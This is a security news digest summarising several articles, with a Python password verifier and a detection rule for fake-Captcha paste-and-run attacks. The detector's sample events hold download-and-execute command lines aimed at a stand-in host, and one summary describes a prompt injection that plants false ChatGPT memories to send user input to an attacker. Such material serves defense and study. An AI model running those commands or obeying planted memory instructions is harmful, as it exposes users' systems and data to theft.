NIST Drops Password Complexity, Mandatory Reset Rules
Article Link: https://www.darkreading.com/identity-access-management-security/nist-drops-password-complexity-mandatory-reset-rules
- The National Institute of Standards and Technology (NIST) has released a new public draft of its Digital Identity Guidelines (NIST SP 800-63-4; the password rules live in volume B, SP 800-63B-4), simplifying password management by dropping the requirements for composition rules (mixed case, digits, symbols) and for mandatory periodic changes.
- The updated guidelines require credential service providers (CSPs) to accept passwords of at least eight characters (with 15 or more recommended) and to permit a maximum length of at least 64 characters, while accepting both ASCII and Unicode characters so users can choose passphrases in their own language.
- NIST’s shift from composition rules to length reflects how users actually behave: forced complexity produces predictable substitutions, while longer passwords or passphrases are easier to remember and far more costly to brute-force.
- By requiring CSPs to force a password change only when there is evidence of compromise, rather than on a calendar schedule, NIST acknowledges that frequent mandatory changes push users toward weaker, incremental passwords; organizations should adopt these rules and teach users to craft long, memorable passwords.
- Link to NIST SP 800-63-4: https://pages.nist.gov/800-63-4/
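To make the new rules concrete, here is an added example, written for this digest and not code from NIST or from the DarkReading article, of a verifier-side check that implements them in Python: length measured in Unicode code points after NFKC normalization, no composition rules, a breached-password blocklist, and a reset decision that depends only on evidence of compromise. The blocklist contents, the exact 64-character cap (the draft requires verifiers to accept at least 64) and the case-insensitive blocklist match are assumptions made for illustration.

```python
import unicodedata

# Thresholds taken from the SP 800-63B-4 draft summarised above.
MIN_LEN = 8           # verifiers SHALL require at least 8 characters
RECOMMENDED_LEN = 15  # and SHOULD require at least 15
MAX_LEN = 64          # verifiers SHALL accept at least 64; a higher cap is permitted

# Constructed stand-in for a breached-password blocklist. A real verifier would
# check against a breach corpus (e.g. via a k-anonymity range query), not a set literal.
BLOCKLIST = {"password", "123456789", "qwertyuiop", "letmeinplease"}


def normalize(password: str) -> str:
    """NFKC-normalize the secret before measuring or comparing it, so that
    full-width or decomposed input of the same visible string yields one secret."""
    return unicodedata.normalize("NFKC", password)


def evaluate_password(password: str) -> dict:
    """Verifier-side check with no composition rules (no digit/symbol/case demands).

    Length is counted in Unicode code points after normalization, never in bytes,
    so a CJK or emoji passphrase is measured correctly.
    """
    pw = normalize(password)
    length = len(pw)
    reasons, advice = [], []

    if length < MIN_LEN:
        reasons.append(f"shorter than {MIN_LEN} characters")
    elif length < RECOMMENDED_LEN:
        advice.append(f"consider {RECOMMENDED_LEN} or more characters, e.g. a passphrase")
    if length > MAX_LEN:
        reasons.append(f"longer than the {MAX_LEN}-character cap")
    # Assumption for this example: match the blocklist case-insensitively so that
    # "Password" is rejected along with "password".
    if pw.casefold() in BLOCKLIST:
        reasons.append("found in the breached-password blocklist")

    return {"accepted": not reasons, "length": length, "reasons": reasons, "advice": advice}


def reset_required(days_since_change: int, evidence_of_compromise: bool) -> bool:
    """Under the draft, a forced change follows evidence of compromise only;
    the age of the password (days_since_change) is deliberately ignored."""
    del days_since_change  # kept in the signature to make the point explicit
    return evidence_of_compromise


if __name__ == "__main__":
    for candidate in ["Password", "ｐａｓｓｗｏｒｄ", "密码是一个长的中文短语", "correct horse battery staple"]:
        print(repr(candidate), evaluate_password(candidate))
```

Note that the full-width input "ｐａｓｓｗｏｒｄ" normalizes to "password" and is rejected by the blocklist, while the 11-character Chinese passphrase (33 bytes in UTF-8) is accepted with only a length suggestion, which is the behaviour the Unicode requirement is meant to produce.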
Hacker Plants False Memories in ChatGPT to Steal User Data in Perpetuity
Article Link: https://arstechnica.com/security/2024/09/false-memories-planted-in-chatgpt-give-hacker-persistent-exfiltration-channel/
- Security researcher Johann Rehberger found that ChatGPT’s long-term memory feature could be abused: a prompt injection hidden in untrusted content could write false “memories” that persist across sessions and cause the model to exfiltrate data from every later conversation, indefinitely.
- OpenAI initially closed the report as a safety issue rather than a security vulnerability. Rehberger then built a proof-of-concept (PoC) in which untrusted content implanted a memory that sent all subsequent user input to an attacker-controlled server. OpenAI responded with a partial fix that closes the exfiltration channel, although untrusted content can still plant memories, so concerns remain.
- Users should periodically review what ChatGPT has stored in memory and delete entries they did not create, and avoid feeding the model untrusted web pages or documents; prompt injection triggers that write to memory still pose a threat to data confidentiality.
Zero Failure Tolerance, A Cybersecurity Myth Holding Back Organizations
Article Link: https://www.infosecurity-magazine.com/news/zero-failure-tolerance/
- The “zero-failure tolerance” mindset in information security is a myth; leaders must prioritize response and recovery over unrealistic prevention-only efforts.
- Unrealistic expectations leave organizations neglecting recovery and mental health support, burning out security teams and weakening defenses.
- Rapid innovations like GenAI demand adaptive strategies; failing to invest in recovery can leave an organization unable to operate after an incident. A strong contingency plan for third-party risks is non-negotiable for sustaining security.
- Success requires abandoning the illusion of perfection, streamlining tools, and building a resilient, mentally strong information security workforce ready to rebound from attacks.
Beware Of Fake Captcha Attacks That Delivers Lumma Stealer Malware
Article Link: https://gbhackers.com/fake-captcha-lumma-stealer-malware/
- In the past month, over 1.4 million users have encountered a surge in fake Captcha campaigns distributing Lumma Stealer, an infostealer built to harvest credentials and other sensitive data. The operators use phishing lures, such as emails impersonating the GitHub Security Team, to drive victims to malicious sites that display a deceptive Captcha screen.
- Following the fake Captcha’s “verification” steps causes victims to copy a malicious command to their clipboard and run it themselves; the command reaches out to a command-and-control (C2) server and installs Lumma Stealer disguised as a legitimate application, SysSetup[.]exe, exposing the user’s data to theft.
- The attacks reported in Italy, Argentina, France, Spain, and Brazil reinforce the need for users to scrutinize unsolicited emails, never paste and execute commands a web page asks them to, enable multi-factor authentication (MFA), and run reputable antivirus software.
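Because the victim ends up pasting and running a copied command, a useful host-side check is to watch for script interpreters spawned from explorer.exe (what the Run dialog and a double-click produce) with a remote-fetch or encoded payload on the command line. Below is an added Python example written for this digest, not code from the GBHackers article or from any vendor; the Sysmon-style events are constructed, and the interpreter list and command-line indicators are assumptions drawn from how such campaigns are generally reported, since the article does not quote the command itself.

```python
import re

# Interpreters a pasted one-liner is usually run through. Assumption for this example.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line indicators of a remote fetch or an obfuscated payload. Assumption for this example.
FETCH_INDICATORS = re.compile(
    r"https?://|\biex\b|invoke-expression|invoke-webrequest|\b(irm|iwr)\b|downloadstring"
    r"|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_like(event: dict) -> bool:
    """True when a script host was launched from explorer.exe with a fetch/obfuscation indicator."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    if image not in SCRIPT_HOSTS or parent != "explorer.exe":
        return False
    return FETCH_INDICATORS.search(event.get("CommandLine", "")) is not None


def triage(events) -> list:
    """Record IDs of events that match the rule, in input order."""
    return [e["RecordId"] for e in events if is_clickfix_like(e)]


# Constructed Sysmon-style process-creation records (not real telemetry);
# captcha-check.example is a reserved, non-routable name.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://captcha-check.example/verify | iex"'},
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-check.example/v.hta"},
    # Benign: a user simply opening an interactive shell from the Start menu.
    {"RecordId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    # Benign: a scheduled task, not launched from explorer.exe and no fetch indicator.
    {"RecordId": 4, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\Patch\update.ps1"},
    {"RecordId": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "curl -s https://captcha-check.example/a -o %TEMP%\a.cmd && %TEMP%\a.cmd"'},
    # Not a script host at all.
    {"RecordId": 6, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe https://example.com/readme.txt"},
]

if __name__ == "__main__":
    print("flagged records:", triage(SAMPLE_EVENTS))
```

Records 1, 2 and 5 are flagged; the interactive shell and the scheduled task are not. In production the same rule belongs in the EDR or SIEM as a query over real process-creation telemetry, with the indicator list tuned to the environment, and it complements rather than replaces the user-education point above: no legitimate Captcha ever asks you to paste something into the Run dialog.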
Security Firm’s North Korean Hacker Hire Not an Isolated Incident
Article Link: https://www.darkreading.com/vulnerabilities-threats/security-hire-north-korean-hacker-not-isolated-incident
- KnowBe4, a security awareness firm, unknowingly hired a North Korean operative posing as a software engineer who began loading malware onto his company workstation as soon as it arrived, exposing a state-sponsored network of fake IT workers that infiltrates U.S. companies for financial gain.
- The attempt was caught before major damage was done, but it exposed the weakness of global hiring practices, particularly for remote roles, where organizations ranging from Fortune 500 companies to small businesses have unknowingly hired North Korean operatives.
- Organizations must revamp their hiring processes with stricter verification, enhanced behavior monitoring, and greater attention to unusual requests. KnowBe4 suggests “threat modeling” for proactive risk identification.
- Immediate remediation includes restricting access, monitoring suspicious activity, and removing employees if they are confirmed to be threat actors.
LinkedIn Is Quietly Training AI on Your Data—Here’s How to Stop It
Article Link: https://www.pcmag.com/news/linkedin-is-quietly-training-ai-on-your-data-heres-how-to-stop-it
- LinkedIn has been quietly using members’ data, including posts and profile information, to train generative AI models without explicit consent. This continues by default in the U.S., while training on data from users in the EU, EEA, UK, and Switzerland has been stopped.
- In the UK, the Information Commissioner’s Office (ICO) raised privacy concerns about the practice, after which LinkedIn suspended model training on UK users’ data, highlighting the importance of protecting user rights. U.S. users remain opted in by default.
- LinkedIn has updated its privacy policy to disclose the AI training, but because EU, EEA, UK, and Swiss users are excluded from it, U.S. users are left with fewer protections.
- Users concerned about privacy can opt out manually under Settings & Privacy > Data privacy > Data for Generative AI Improvement; this stops future use of their data but does not undo training that has already taken place.
Cybersecurity Incident Affects Arkansas City, KS Water Treatment Facility
Article Link: https://www.infosecurity-magazine.com/news/incident-arkansas-city-water/
- On September 22, 2024, the city of Arkansas City, Kansas, reported a cybersecurity incident at its water treatment facility and immediately switched the plant to manual operations while cybersecurity experts worked to restore automated systems under local authorities’ oversight.
- City Manager Randy Frazer assured residents that the water supply remained safe and uninterrupted, and that the city retained full control of the system throughout the response.
- Although specific details remain undisclosed, initial indications point to a potential ransomware attack, since a shift to manual operations typically follows an attempt to contain such an intrusion.
- The incident exposes how vulnerable public utilities are and underlines the need for regular security assessments, employee training, data encryption, physical controls, multi-factor authentication (MFA), and clear incident response plans.
- Link to Arkansas City’s Announcement: https://www.arkcity.org/environmental-services/page/city-arkansas-city-faces-cybersecurity-incident
California’s Gavin Newsom Vetoes Controversial AI Safety Bill
- Governor Gavin Newsom vetoed an AI safety bill, SB 1047, citing its narrow focus on large AI models while smaller systems handling critical tasks were overlooked. Tech giants like OpenAI opposed the bill.
- The bill aimed to prevent significant AI-related harm, but tech companies warned it could stifle innovation and create legal confusion.
- Newsom is collaborating with AI experts to develop broader legislation while signing other AI-related bills on deepfakes, content labeling, and digital rights.
Ever Wonder How Crooks Get the Credentials to Unlock Stolen Phones?
Article Link: https://arstechnica.com/security/2024/09/cops-bust-website-crooks-used-to-unlock-1-2-million-stolen-mobile-phones/
- Law enforcement agencies recently shut down iServer, a phishing-as-a-service platform used to unlock over 1.2 million stolen mobile phones, demonstrating both the scale of organized cybercrime and how readily device protections fall once the owner’s credentials are phished.
- Since its launch in 2018, iServer let low-skilled criminals phish credentials from unsuspecting phone owners via text messages, email, and voice calls, then use them to defeat security measures like Apple’s “Lost Mode” that otherwise keep a lost or stolen device locked.
- Authorities arrested the Argentine national behind iServer and identified more than 2,000 “unlockers” who used the platform to harvest device passcodes and account credentials and hand them to fellow criminals who held the locked phones.
- With the iServer domain seized, security practitioners stress the importance of recognizing phishing and social engineering tactics, especially messages claiming a lost device has been found, and practicing stronger cyber-hygiene to protect personal data and devices.
